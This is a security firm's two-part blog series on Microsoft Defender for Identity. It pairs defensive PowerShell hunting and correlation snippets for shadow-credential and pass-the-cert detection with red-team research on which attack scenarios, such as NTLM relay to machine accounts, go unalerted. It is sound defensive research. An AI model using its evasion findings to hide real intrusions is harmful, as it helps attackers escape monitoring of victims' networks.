Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026

Introduction

The first blog post highlighted the detection capabilities of Microsoft Defender for Identity (DfI) and the evasion options that result from them. It can be found here: Microsoft Defender for Identity evasions in 2026 – Part I. This second part complements it in two ways. It presents alternative detection possibilities that help the defensive side improve visibility and security, and it covers the upgrade from DfI version 2.2 to DfI version 3.0.

Shadow credentials

As discussed in the first part, DfI does not directly detect that a shadow credential was set for a user, except for the built-in administrator. It only detects the later use of that shadow credential when a TGT is requested. Because the respective alert relies on information that the attacker controls, this detection is also unreliable and can be evaded.

Additionally, it was stated that there is no detection logic for setting shadow credentials for machine accounts over NTLM-relayed connections. In that scenario, detection relies solely on the alerts for authentication coercion and NTLM relaying. Technically, DfI already implements the required detection logic, but it does not apply it when a machine account writes a shadow credential to a machine account. The Network Name Resolution (NNR) feature is a core detection component. However, it is not used to recognize that the origin of the write, i.e. the source IP address, does not belong to the identity that wrote the shadow credential.

Shadow credentials: indicators of compromise through device ID

Alternative indicators of compromise (IoCs) for setting a shadow credential exist for the scenarios described, but DfI does not use them. They apply to both user accounts and machine accounts, and both derive from the same value: the device ID.

The shadow-credentials attack technique abuses the msDS-KeyCredentialLink (KCL) attribute of a user or computer object. This attribute can store public keys for that entity, which allows Kerberos authentication with the corresponding key pair. A malicious actor with permission to modify the attribute can write their own public key into it. They can then use the matching private key to authenticate as that entity via Kerberos.
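Each value of the KCL attribute is stored in DN-with-binary syntax: the letter B, the number of hex digits, the hex data and the owner DN, separated by colons. Defenders may want to look at raw values without extra modules. As a minimal sketch for that case, the hypothetical helper ConvertFrom-DNWithBinary below splits such a value into its binary blob and owner DN. It is not part of the ActiveDirectory, WHfBTools or DSInternals modules, and it assumes well-formed input.

```powershell
# Hypothetical helper (not part of any module): splits one msDS-KeyCredentialLink
# value in DN-with-binary syntax into its raw blob and the owner DN.
function ConvertFrom-DNWithBinary {
    param([Parameter(Mandatory)][string]$Value)

    # Expected layout: B:{hex digit count}:{hex data}:{owner DN}
    if (-not ($Value -match '^B:(\d+):([0-9A-Fa-f]*):(.+)$')) {
        throw "Not a DN-with-binary value: $Value"
    }
    $count   = [int]$Matches[1]
    $hex     = $Matches[2]
    $ownerDN = $Matches[3]
    if ($hex.Length -ne $count -or ($count % 2) -ne 0) {
        throw "Declared length $count does not match $($hex.Length) hex digits"
    }

    # Two hex digits form one byte.
    $bytes = [byte[]]::new($count / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($hex.Substring(2 * $i, 2), 16)
    }
    [pscustomobject]@{ Blob = $bytes; OwnerDN = $ownerDN }
}
```

In a domain, a value could be taken from (Get-ADUser -Identity ADM -Properties 'msDS-KeyCredentialLink').'msDS-KeyCredentialLink'. The resulting blob is what the device-ID checks discussed in this section operate on.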

IoC: device ID for user objects

The feature behind the KCL attribute that shadow credentials abuse comes from the older Windows Hello for Business (WHfB) key trust model, which enables passwordless authentication. Nowadays, Microsoft recommends cloud Kerberos trust for WHfB deployments.

When a user enrolls WHfB on a new device, the trusted platform module (TPM) generates a key pair and stores the private key, and a self-signed certificate is generated. The public key is stored as a next-generation credentials (NGC) key in the user’s KCL attribute. It is stored together with the GUID of the computer object on which WHfB was registered. A legitimate NGC key on a user object therefore references the corresponding computer object by the computer’s GUID, also known as the device ID.
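The binary blob behind an NGC key can be decoded to show these fields. The sketch below follows the KEYCREDENTIALLINK_BLOB layout from Microsoft's [MS-ADTS] specification. That layout is a 4-byte version (0x200) followed by entries, each made of a 2-byte little-endian length, a 1-byte identifier and the value. The sketch only extracts the key usage, the device ID and the creation time. The function name Read-KeyCredentialBlob is hypothetical, and the code assumes a little-endian host. Reading KeyCreationTime as a FILETIME is also an assumption that should be checked against real data.

```powershell
# Sketch of a KEYCREDENTIALLINK_BLOB reader: 4-byte version (0x200), then entries of
# [2-byte little-endian length][1-byte identifier][value]. Assumes a little-endian host.
function Read-KeyCredentialBlob {
    param([Parameter(Mandatory)][byte[]]$Blob)

    if ($Blob.Length -lt 4 -or [BitConverter]::ToUInt32($Blob, 0) -ne 0x200) {
        throw 'Unsupported KEYCREDENTIALLINK_BLOB version'
    }

    $result = [ordered]@{ Usage = $null; DeviceId = $null; CreationTime = $null }
    $offset = 4
    while ($offset + 3 -le $Blob.Length) {
        $length     = [BitConverter]::ToUInt16($Blob, $offset)
        $identifier = $Blob[$offset + 2]
        $start      = $offset + 3
        if ($start + $length -gt $Blob.Length) { throw 'Truncated entry' }

        switch ($identifier) {
            0x04 {  # KeyUsage: 0x01 = NGC, 0x07 = FIDO, 0x08 = FEK
                $result.Usage = switch ($Blob[$start]) {
                    1 { 'NGC' } 7 { 'FIDO' } 8 { 'FEK' } default { "Unknown($_)" }
                }
            }
            0x06 {  # DeviceId: a 16-byte GUID
                if ($length -eq 16) {
                    $result.DeviceId = [guid]::new([byte[]]$Blob[$start..($start + 15)])
                }
            }
            0x09 {  # KeyCreationTime, interpreted here as a FILETIME (assumption)
                $result.CreationTime = [DateTime]::FromFileTimeUtc([BitConverter]::ToInt64($Blob, $start))
            }
        }
        $offset = $start + $length
    }
    [pscustomobject]$result
}
```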

Current tools such as Whisker and Pywhisker generate a random device ID, which is not assigned to any computer, when they create a shadow credential. This device ID is stored in the NGC key and could be used to detect a shadow-credentials attack. During the write operation on the KCL attribute, it would have to be verified whether the specified device ID corresponds to an existing computer object at all. If the device ID cannot be matched to a computer object even at the time the WHfB key is written, the operation should be treated as an attack.

Microsoft’s own PowerShell module, WHfBTools, is designed specifically to remove WHfB keys from user objects. In doing so, it can tell the user whether a key is orphaned. This decision is based on whether the key’s device ID matches the GUID of a computer object. The functionality DfI would need to determine whether a WHfB key is a shadow credential is therefore already present in this tool. The following image shows the difference between a legitimate WHfB key and a shadow credential:

Figure 1: KCL attribute of a user
Author: Jakob Scholz, Consultant

Figure 1 shows the entries of the KCL attribute of the user “Alonso.Hall”. Two NGC keys are registered for him. The first is a shadow credential set by Whisker. The second is a WHfB key created through the regular process of registering WHfB on a new device.

As figure 2 shows, Microsoft’s WHfBTools flags the NGC key that is a shadow credential as orphaned.

Figure 2: Using WHfBTools to identify shadow credentials

The legitimate WHfB key was enrolled on PC02, so the device ID of that key points to the GUID of PC02:

Figure 3: GUID PC02
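The orphan decision that WHfBTools makes can be approximated with a simple set lookup. In the following sketch, the function name Test-OrphanedKey is hypothetical. It expects the objectGUIDs of all computer objects, which in a live domain could come from (Get-ADComputer -Filter *).ObjectGUID. It then flags every key whose device ID is missing or matches none of them. The sketch illustrates the idea and is not a reimplementation of WHfBTools.

```powershell
# Hypothetical orphan check: a key is flagged when its device ID is missing or
# matches no objectGUID of a computer object.
function Test-OrphanedKey {
    param(
        [Parameter(Mandatory)][AllowEmptyCollection()][guid[]]$ComputerGuids,
        [Parameter(Mandatory, ValueFromPipeline)]$Key   # any object with a DeviceId property
    )
    begin {
        # A HashSet keeps lookups cheap even in domains with many computer objects.
        $known = [System.Collections.Generic.HashSet[guid]]::new($ComputerGuids)
    }
    process {
        [pscustomobject]@{
            DeviceId = $Key.DeviceId
            Orphaned = ($null -eq $Key.DeviceId) -or -not $known.Contains([guid]$Key.DeviceId)
        }
    }
}
```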

When actively hunting for shadow-credential IoCs, the WHfBTools module can be used to extract the information stored in the KCL attribute of user objects.

To extract the KCL attribute of the user “Alonso.Hall”, the following command would be used:

Get-ADWHfBKeys -Domain jsc.lab -SamAccountName Alonso.Hall

To check whether a key is a shadow credential, verify its device ID, which should point to the GUID of a computer object in Active Directory. This is done by searching for a computer object with that GUID using the ActiveDirectory module:

Get-ADComputer -Identity be42eae5-239b-40da-8c01-41d9ea0df7af

If no computer object exists under that GUID and the key credential was set recently, this is highly suspicious. In that case, Get-ADComputer fails with an identity-not-found error.
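The two conditions can be folded into a simple triage rule. In the sketch below, the function name, the verdict strings and the seven-day window for “recently” are all assumptions chosen for illustration. ComputerExists stands for the outcome of the Get-ADComputer lookup above. KeyCreationTime stands for the creation time stored in the key credential.

```powershell
# Hypothetical triage rule: orphaned device ID + recent creation = highly suspicious.
# The seven-day window is an illustrative assumption, not a DfI or WHfBTools value.
function Get-ShadowCredentialVerdict {
    param(
        [Parameter(Mandatory)][bool]$ComputerExists,
        [Parameter(Mandatory)][datetime]$KeyCreationTime,
        [datetime]$Now = (Get-Date),
        [timespan]$RecentWindow = [timespan]::FromDays(7)
    )
    if ($ComputerExists) { return 'Likely legitimate' }
    if (($Now - $KeyCreationTime) -le $RecentWindow) { return 'Highly suspicious' }
    return 'Orphaned, review'
}
```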

The blog post Detecting shadow credentials also explains how to search for shadow credentials on user objects in hybrid setups with Entra ID.

IoC: device ID for computer objects

For the NGC keys of computer objects, the device ID also plays a role in identifying shadow credentials.

Computer objects have the right to write their own KCL attribute. Certain requirements must be met, such as Credential Guard running or a TPM being present. When they are, the computer can create a key pair, protect the private key with Credential Guard or the TPM, and store the public key in its KCL attribute. This enables the computer to perform Kerberos authentication using key trust. The feature is called “domain-joined device public key authentication”.

If the Group Policy setting “Support device authentication using certificates” is enabled on the relevant computer, the computer can authenticate via Kerberos PKINIT using this key pair. Writing their own KCL attribute is therefore legitimate for computer objects. As a result, a shadow credential can be set for a DC or a CA without being detected if it is written under the identity of that machine account.

Although DfI does not use NNR to detect shadow credentials set over NTLM relay, the device ID can be used to identify them. A legitimate NGC key on a computer object is used by that computer itself, so it has no other device to link to and its device ID field is empty. When ntlmrelayx is used to set the shadow credential, however, it generates a random device ID, which indicates that the NGC key is a shadow credential. Inspecting the KCL attribute of PC02, which has an NGC key enrolled through Credential Guard, shows that the device ID is empty:

Figure 4: KCL attribute of PC02

Unfortunately, WHfBTools can only display the KCL attribute of user objects. For computer objects, the DSInternals PowerShell module can be used instead. Note that security products may flag DSInternals as malicious, because it can also be used offensively. The following snippet finds all NGC key credentials on computer objects in Active Directory whose “DeviceId” field is not empty:

# Requires the ActiveDirectory and DSInternals modules
Get-ADComputer -Filter 'msDS-KeyCredentialLink -like "*"' -Properties 'msDS-KeyCredentialLink' |
    Select-Object -ExpandProperty 'msDS-KeyCredentialLink' |
    Get-ADKeyCredential |
    Where-Object { $_.Usage -eq 'NGC' -and -not [string]::IsNullOrWhiteSpace($_.DeviceId) }

Pass the cert

Pass-the-cert attacks can be detected by monitoring several kinds of Windows security events. AD CS events for issued certificates, Kerberos authentications using PKINIT and modifications of the key credential link attribute should all be monitored and correlated.

Pass the cert after shadow-credential attack

When PKINIT is used to authenticate, the Windows security event 4768 (“A Kerberos authentication ticket (TGT) was requested”) is logged with its certificate information filled in, which indicates that a certificate was used. This event can be correlated with event 5136 (“A directory service object was modified”) when the KCL attribute of the same entity was modified. The discussed tools WHfBTools and DSInternals can be used to parse the KCL attribute. If parsing indicates that a shadow credential was set, the subsequent Kerberos PKINIT authentication should be considered suspicious, too.
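A minimal correlation of the two events could look like the following sketch. The function name Find-KclThenPkinit and the 24-hour window are hypothetical. The sketch assumes both event types have already been normalized into objects with Id, TimeCreated, Account (sAMAccountName) and, for 4768, PreAuthType. Resolving the ObjectDN of a 5136 event to an account name is left out. Microsoft's documentation for event 4768 associates pre-authentication types 15, 16 and 17 with certificate-based (smart card/PKINIT) logons.

```powershell
# Hypothetical correlation: a PKINIT TGT request (4768) for an account whose
# msDS-KeyCredentialLink was modified (5136) shortly before is reported.
function Find-KclThenPkinit {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [timespan]$Window = [timespan]::FromHours(24)   # assumed correlation window
    )
    $kclWrites = @($Events | Where-Object { $_.Id -eq 5136 })
    # Pre-authentication types 15-17 denote certificate-based (PKINIT) logons.
    $pkinit = @($Events | Where-Object { $_.Id -eq 4768 -and $_.PreAuthType -in 15, 16, 17 })

    foreach ($tgt in $pkinit) {
        foreach ($write in $kclWrites) {
            $delta = $tgt.TimeCreated - $write.TimeCreated
            # -eq on strings is case-insensitive, so 'ADM' matches 'adm'.
            if ($write.Account -eq $tgt.Account -and
                $delta -ge [timespan]::Zero -and $delta -le $Window) {
                [pscustomobject]@{
                    Account   = $tgt.Account
                    KclWrite  = $write.TimeCreated
                    PkinitTgt = $tgt.TimeCreated
                }
            }
        }
    }
}
```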

General signs for pass the cert

When AD CS is used in the environment, certificate-issuing activity should also be monitored. The relevant event is 4887 (“Certificate Services approved a certificate request and issued a certificate”), which appears on the CA and must be logged there. Defenders can also look for PKINIT authentications by users and machines that normally never use PKINIT. This is especially relevant when the request comes from a new or unexpected host. Such authentications are even more suspicious if WHfB is not used in the environment or no certificate services are deployed.
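The last two heuristics lend themselves to simple baselining. The following sketch is hypothetical: the function name, input shape and reason strings are all assumptions. It expects PKINIT logons, for example taken from 4768 events, as objects with Account and ClientAddress. From a baseline period, it learns which hosts each account used for PKINIT. It then reports accounts that never used PKINIT before, as well as known accounts that appear from a new host.

```powershell
# Hypothetical PKINIT baselining: report first-time PKINIT accounts and known
# PKINIT accounts that authenticate from a host not seen in the baseline.
function Find-UnusualPkinit {
    param(
        [Parameter(Mandatory)][AllowEmptyCollection()][object[]]$Baseline,
        [Parameter(Mandatory)][AllowEmptyCollection()][object[]]$Recent
    )
    # Account -> set of client addresses seen with PKINIT (hashtable keys are case-insensitive).
    $known = @{}
    foreach ($entry in $Baseline) {
        if (-not $known.ContainsKey($entry.Account)) {
            $known[$entry.Account] = [System.Collections.Generic.HashSet[string]]::new()
        }
        [void]$known[$entry.Account].Add($entry.ClientAddress)
    }

    foreach ($entry in $Recent) {
        $reason = $null
        if (-not $known.ContainsKey($entry.Account)) {
            $reason = 'Account never used PKINIT before'
        }
        elseif (-not $known[$entry.Account].Contains($entry.ClientAddress)) {
            $reason = 'PKINIT from a new host'
        }
        if ($reason) {
            [pscustomobject]@{ Account = $entry.Account; ClientAddress = $entry.ClientAddress; Reason = $reason }
        }
    }
}
```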

Alternative handling of NNR-based alerts

The first blog post discussed three alerts that can be evaded by tampering with NNR. They belong to the attack techniques DCSync, ESC8 and a special case of pass the cert in which a domain controller machine account is used to request a TGT.

All of these alerts share the same detection logic. For DCSync, DfI checks whether the source IP address of the potential attack belongs to a domain controller. For ESC8 and pass the cert, it checks whether the address belongs to the specific domain controller in whose context the request was made.

Since the primary methods that DfI version 2.2 uses, based on the three protocols NetBIOS, DCE/RPC and RDP, can be evaded, a better approach is to rely on information that is outside the attacker’s control.

As explained, DfI’s secondary option uses the Domain Name System (DNS) to resolve IP addresses to hostnames. However, it only serves as a fallback when the primary methods return unclear responses or none at all.

One approach is to use this secondary option yourself, for instance during manual monitoring or when searching for IoCs. The corresponding events to look for in the Windows event logs are:

  • Pass the cert (domain controller): 4768
  • ESC8: 4887
  • DCSync: 4661 and 4662

These events show under which identity the operation was performed and, where it is recorded, from which source IP address the request originated. Some events, such as 4661 and 4662, do not record a client address. For these, the address can be obtained by correlating the Logon ID with the matching logon event (4624). A reverse DNS lookup of the source IP address can then reveal whether the address belongs to the machine whose identity was used to request the resources.
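The reverse-lookup check can be sketched as follows. The function name is hypothetical. It compares the first label of the PTR name with the machine account, for example DC01$ from a 4768 event, and it treats a missing PTR record as unverified. The default resolver assumes the Windows DnsClient module's Resolve-DnsName, restricted to DNS with -DnsOnly. This keeps NetBIOS or LLMNR, which an attacker could answer, out of the lookup. A different resolver can be passed as a scriptblock.

```powershell
# Hypothetical check: does the reverse-DNS name of the source IP belong to the machine
# account that performed the operation (e.g. 'DC01$')? The default resolver queries DNS
# only (Windows DnsClient module); any scriptblock returning an FQDN can be passed instead.
function Test-SourceMatchesIdentity {
    param(
        [Parameter(Mandatory)][string]$SourceIp,
        [Parameter(Mandatory)][string]$MachineAccount,
        [scriptblock]$Resolver = {
            param($ip)
            (Resolve-DnsName -Name $ip -Type PTR -DnsOnly -ErrorAction Stop |
                Where-Object Type -eq 'PTR' | Select-Object -First 1).NameHost
        }
    )
    try { $fqdn = & $Resolver $SourceIp } catch { $fqdn = $null }
    if (-not $fqdn) { return $false }   # no PTR record: the source cannot be verified

    $hostLabel = ([string]$fqdn).Split('.')[0]
    $account   = $MachineAccount.TrimEnd('$')
    return $hostLabel -eq $account      # PowerShell's -eq is case-insensitive for strings
}
```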

Inspecting Defender for Identity combined with Defender for Endpoint

A detection weakness discussed earlier concerns shadow credentials set for user objects. DfI only raises an alert when the shadow credential is set for the AD built-in administrator (S-1-5-21-<domain>-500), not for other user objects. When Defender for Endpoint (DfE) is combined with DfI, setting shadow credentials for user objects can be detected, which DfI alone does not achieve. However, this only works if the attacker is caught on an endpoint, i.e. when DfE notices that a tool like Whisker or Pywhisker was used. An advanced attacker will most likely keep their offensive tooling from being detected by DfE. Even so, the way DfE and DfI indicators are combined is interesting.

When DfE notices the usage of Whisker, it raises the alert “An active ‘Whisz’ malware process was detected while executing”, showing the information about the execution on the command line and the user under whose identity this was done:

Figure 5: Usage of Whisker detected by DfE

The user “Alonso.Hall” set the shadow credential for the user “ADM”. When DfI is also deployed in the environment and detects event 5136, both pieces of information are combined, and Defender XDR raises the alert “Shadow credentials added to account”.

The first indicator is the execution of Whisker under the identity of the user “Alonso.Hall”. The second is the security event showing that “Alonso.Hall” modified the KCL attribute of the user “ADM” at the same time as the execution of Whisker was registered:

Figure 6: Event 5136: Shadow-credential set to ADM

Upgrading to Defender for Identity 3.0

The best way to handle the alerts for attacks against domain controllers that can be evaded by spoofing NNR answers is to upgrade to DfI version 3.0. This version uses the Defender device inventory as a trusted database for the resolution that NNR relies on. As a result, the potential attacker is no longer involved in the detection logic.

As the deployment diagram in figure 7 (as of March 2026) shows, only domain controllers can use sensor version 3.0. The CA, federation and Entra Connect servers remain on sensor version 2.2. On domain controllers, version 3.0 requires Windows Server 2019 or later with DfE running on the server.

Figure 7: DfI sensor deployment overview (https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity)
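The two domain controller requirements named above can be pre-checked on each server. The sketch below is hypothetical and checks only these two conditions. The first is an OS build of at least 17763 (Windows Server 2019). The second is a running Sense service, which is the Windows service of Defender for Endpoint. Microsoft's migration guide remains the authoritative list of prerequisites.

```powershell
# Hypothetical pre-check for the two sensor v3.0 requirements named in the text.
# Defaults read the local machine; both values can be passed in explicitly.
function Test-DfISensorV3Readiness {
    param(
        [int]$OsBuild = [Environment]::OSVersion.Version.Build,
        [string]$SenseStatus = (Get-Service -Name Sense -ErrorAction SilentlyContinue).Status
    )
    $issues = @()
    if ($OsBuild -lt 17763) {
        $issues += "OS build $OsBuild is older than Windows Server 2019 (17763)"
    }
    if ($SenseStatus -ne 'Running') {
        $issues += 'Defender for Endpoint service (Sense) is not running'
    }
    [pscustomobject]@{ Ready = ($issues.Count -eq 0); Issues = $issues }
}
```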

Upgrading from DfI sensor version 2.2 to 3.0 is straightforward. Once the requirements are met, the migration can be performed in the Microsoft Defender portal by following the guide Migrate from Defender for Identity sensor v2 to sensor v3.x.

Another advantage of sensor 3.0 over 2.2 is “automatic Windows event auditing”, which configures the correct auditing of Windows security events. In DfI version 2.2, detection capabilities were reduced if the relevant events were not audited properly. Version 3.0 fixes this problem.

It is important to note that the sensor must be upgraded to version 3.0 manually. There is no mechanism that performs the upgrade automatically through an update.

References

  1. https://support.microsoft.com/en-us/topic/using-whfbtools-powershell-module-for-cleaning-up-orphaned-windows-hello-for-business-keys-779d1f3f-bb2d-c495-0f6b-9aeb940eeafb
  2. https://learn.microsoft.com/en-us/windows-server/security/kerberos/domain-joined-device-public-key-authentication
  3. https://learn.microsoft.com/en-us/defender-for-identity/deploy/migrate-to-sensor-v3
  4. https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/

Further blog articles

Red Teaming

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026 – Microsoft Defender for Identity (DfI) is one of Microsoft’s key solutions for detecting identity-based attacks in Active Directory environments – but how well does it hold up against a skilled attacker? This two-part blog post dives into DfI’s detection capabilities for high-impact attacks such as shadow credentials, pass-the-cert, ESC8, and DCSync. Additionally, it uncovers a spoofing and relaying vulnerability in DfI’s Network Name Resolution component that can be used to evade multiple alerts, and offers blue team perspectives on closing these gaps.


Author: Jakob Scholz

Red Teaming

Windows Instrumentation Callbacks – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco


Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026

Introduction

Working with Microsoft Defender for Identity (DfI) from an offensive perspective, for instance during a red team assessment, is not new territory. Existing research already highlights detection and evasion possibilities for several of its alerts. Synacktiv, for example, has examined one of the pass-the-cert alerts (“Suspicious certificate usage over Kerberos protocol (PKINIT)”) and multiple reconnaissance alerts. It has also examined the alerts for Kerberoasting, AS-REP roasting and golden-ticket attacks.

The first part of this blog post summarizes research conducted at cirosec over the last few weeks. It covers DfI’s detection capabilities for high-impact attacks on Active Directory, such as shadow credentials, pass the cert, ESC8 and DCSync, together with the respective evasion possibilities. It also introduces one of DfI’s main components, “Network Name Resolution”. This component is vulnerable to spoofing and relaying in DfI version 2.2, which allows multiple alerts to be evaded. Differences between DfI versions 2.2 and 3.0 are highlighted and demonstrated.

The second part of the blog post takes the blue team’s perspective. It offers alternative ways to detect some of the attacks that were performed while evading DfI. It can be found here: Microsoft Defender for Identity evasions in 2026 – Part II

In this blog post, the term “evasion” is used in two ways. The first refers to cases where no detection logic exists for a part of an attack, so DfI raises no alert at all. The second refers to actively misleading existing detection logic while performing an attack in order to avoid the alert.

Defender for Identity – architecture and overview

Microsoft DfI is one of the main components of the Microsoft Defender XDR solution, alongside other security products such as Microsoft Defender for Endpoint and Defender for Office 365. DfI helps organizations detect identity-related attacks across on-premises Active Directory. To do so, it collects signals from the network through sensors installed on the most critical Windows servers. The identity signals gathered by these sensors are sent to the Microsoft Defender XDR portal. There they are correlated with data from other products such as Defender for Endpoint. This correlation can highlight ongoing attacks that start at one endpoint and move across the domain toward sensitive targets such as domain controllers.

Figure 1: Microsoft Defender XDR (https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview)

The following Windows server roles are currently supported for DfI deployment:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

Laboratory setup

Figure 2: Lab setup
Author: Jakob Scholz, Consultant

The lab setup consists of two domain controllers (DCs), one running DfI version 2.2 and one running version 3.0, plus a certificate authority (CA). In addition, there are two clients: a domain-joined Windows workstation called PC02 and a Kali client that is not domain-joined. Both clients represent an attacker on the network. Having domain controllers with the two DfI versions allows testing against both.

The alerts covered in this blog post have no learning period. This means no baseline of normal and abnormal network activity has to be learned over time. They rely on “static” conditions, so they work from the start of the deployment. Whether an alert has a learning period is stated in the DfI documentation here, at least for alerts classified as “DfI classic alerts”. Microsoft is currently transitioning the DfI classic alerts to “DfI XDR alerts”, for which less information is provided.

Another aspect to consider is the endpoint from which attacks are carried out. Defender XDR correlates information across its security products, so it can even detect attacks that evade DfI. This happens, for instance, when the tool used for an attack is recognized on an endpoint monitored by Defender for Endpoint. Since the focus was on DfI only, PC02 was set up without Defender for Endpoint in the lab.

All results shown in this blog post were generated between November 1, 2025 and February 1, 2026 and are based on the lab setup, which does not represent an enterprise environment. DfI may therefore behave differently, and the results may differ, in a production environment.

Shadow credentials

Attack overview

The shadow-credentials attack makes use of the msDS-KeyCredentialLink (KCL) attribute. This attribute can store public keys and link them to the corresponding user or computer object, which allows Kerberos authentication. An attacker who can write the KCL attribute of another user or computer can store their own public key there. They can then authenticate as that entity with the corresponding certificate. The authentication uses the Kerberos extension “Public Key Cryptography for Initial Authentication” (PKINIT), in which the certificate is presented. The following weaknesses and evasion options apply to both DfI versions 2.2 and 3.0.

General detection requirements

Regarding alerting, there are two relevant alerts, and three scenarios must be distinguished when looking at DfI’s detection capabilities. The scenarios differ in which entity sets a shadow credential for which entity. The relevant difference is the target type, i.e. whether it is a user object or a computer object.

A general requirement for DfI to identify a shadow-credentials attack is correct auditing on the domain controllers. Event 5136 (“A directory service object was modified”) is required so that DfI can recognize that the KCL attribute was modified. This attribute is where the public key, i.e. the shadow credential, is stored.
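Whether the audit subcategory behind event 5136, Directory Service Changes, is enabled can be checked with auditpol. The hypothetical function below parses the text output of auditpol /get /subcategory:"Directory Service Changes" and assumes its English-language format. A Success setting is necessary but not sufficient, because 5136 is only generated for objects whose SACL audits the modification.

```powershell
# Hypothetical check: is "Directory Service Changes" (source of event 5136) audited for
# Success? Parses the English-language text output of auditpol.
function Test-DsChangeAuditing {
    param(
        [string[]]$AuditPolOutput = (auditpol.exe /get /subcategory:"Directory Service Changes")
    )
    foreach ($line in $AuditPolOutput) {
        # Subcategory name, at least two spaces, then the setting column.
        if ($line -match '^\s*Directory Service Changes\s{2,}(.+?)\s*$') {
            return $Matches[1] -match 'Success'
        }
    }
    return $false   # subcategory not found in the output
}
```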

User to user

In the first scenario, a user is able to set a shadow credential for another user. There seems to be almost no detection logic for this. A user can set a shadow credential for any other user, except the AD built-in administrator (S-1-5-21-<domain>-500), without raising the alert.

When a shadow credential is set (in this case for the built-in administrator), event 5136 is generated first and evaluated by DfI:

Figure 3: Shadow credential – event 5136

If done for the built-in administrator, the alert for setting a shadow credential is raised:

Figure 4: Shadow credential alert: Suspected account takeover using shadow credentials

For all other user objects, even those that are highly privileged through group membership, shadow credentials can be set without alerting DfI. In the tests, the users for which a shadow credential was set were members of the following groups:

  • Administrators
  • Domain Admins
  • Enterprise Admins
  • Group Policy Creator Owners
  • Schema Admins
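From the defender’s side, this gap suggests hunting on every write to the KCL attribute rather than only on the built-in administrator. The sketch below (the function name Get-KclWrite is hypothetical) filters 5136 events for added msDS-KeyCredentialLink values. The events are passed as XML, for example via $event.ToXml() on the output of Get-WinEvent. The filter relies on the message insert %%14674, which event 5136 uses for the operation type “Value Added”.

```powershell
# Hypothetical hunting filter: returns every 5136 event that added a value to
# msDS-KeyCredentialLink, regardless of which account was targeted.
function Get-KclWrite {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$EventXml)
    process {
        $xml  = [xml]$EventXml
        $data = @{}
        # Each EventData/Data element carries its field name in the Name attribute.
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # %%14674 is the insert string for "Value Added" in event 5136.
        if ($data['AttributeLDAPDisplayName'] -eq 'msDS-KeyCredentialLink' -and
            $data['OperationType'] -eq '%%14674') {
            [pscustomobject]@{
                Subject  = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
                TargetDN = $data['ObjectDN']
            }
        }
    }
}
```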

User to computer

The second scenario is writing a shadow credential from a user context to a computer object. Here, sensitive and non-sensitive computer objects must be distinguished. Some computer objects are considered sensitive, and an alert is raised immediately when a shadow credential is set for them. These are Windows servers with the following roles:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

This list is not exhaustive, and more server roles could be affected. But regular workstations that don’t hold a Windows server role seem to be classified as non-sensitive by Microsoft, and shadow credentials can be set without any alerting.

Computer to computer

An attacker can combine authentication coercion with NTLM relaying to authenticate as a foreign computer and write shadow credentials for the impersonated computer. This works because computer objects have the legitimate right to edit their own KCL attribute.

In a coercion attack, a third-party machine account can be forced to authenticate via NTLM to a target of the attacker’s choosing. The attacker can forward this authentication information to another target via NTLM relaying and can thus impersonate the relayed machine account. Extensive information about these two attack techniques can be found in the following two blogposts: NTLM Relay and The Ultimate Guide to Windows Coercion Techniques in 2025.

The context differs from writing a shadow credential from a user identity to a computer. Here, a machine account writes the shadow credential for itself, and a legitimate mechanism makes use of exactly that. This may be why no shadow-credentials alert is raised when one is set for a sensitive computer object such as a DC or a CA through NTLM relaying. Windows supports “domain-joined device public key authentication”, which allows a computer to perform Kerberos authentication using key trust. When certain requirements are met, such as Credential Guard running or a TPM being present, the device can create a key pair and store the public key in its KCL attribute.

When performing the attack, keep in mind that DfI has alerts targeting NTLM relaying and authentication coercion. However, as described, there is no detection for the shadow-credentials attack itself in the NTLM relay scenario. In that scenario, the computer object’s own identity is used to write the shadow credential for that computer.

Shadow-credentials alert through PKINIT

The second alert that can be triggered in the context of a shadow-credentials attack is called “Shadow Credential Added to Account and used for Authentication”. It depends on another alert, “Suspicious certificate usage over Kerberos protocol (PKINIT)”. That alert is triggered when DfI classifies the use of a certificate via the PKINIT extension as a pass-the-cert attack, which is explained in the next section. The shadow credential is redeemed for a Ticket Granting Ticket (TGT) via the PKINIT extension of the Kerberos protocol. At that point, the pass-the-cert detection can reveal the shadow credential retroactively. This extends detection to shadow credentials set for user objects, which, as stated previously, were almost never detected otherwise. The problem with this alert, however, is that its dependency on another alert makes it less robust. Anyone who evades “Suspicious certificate usage over Kerberos protocol (PKINIT)” automatically evades “Shadow Credential Added to Account and used for Authentication” as well.

Pass-the-cert attack

Attack overview

Once an attacker has obtained a certificate through a shadow-credentials attack or an ADCS-ESC vulnerability, they can use it to request a TGT. This authenticates them as the victim in whose context the certificate was created. The ADCS-ESC vulnerabilities are a range of possible misconfigurations of Active Directory Certificate Services. See the SpecterOps whitepaper Certified Pre-Owned for more information.

Reviewing an existing evasion possibility

DfI comes with detection logic for this attack that tries to determine whether an offensive tool like Rubeus was used to build the Authentication Service request (AS-REQ). The AS-REQ is the initial Kerberos message a client sends to the Key Distribution Center (KDC) to request a TGT and start the authentication process. The detection looks at how the ticket was requested. Synacktiv researched the respective alert, “Suspicious certificate usage over Kerberos protocol (PKINIT)”. They found that DfI uses the eTypes to tell whether an AS-REQ was built legitimately or by an attack tool. The eTypes are the encryption types the client proposes for encrypting the Kerberos tickets. The ones Rubeus proposes when building an AS-REQ are unique, which makes it easy for DfI to fingerprint Rubeus.

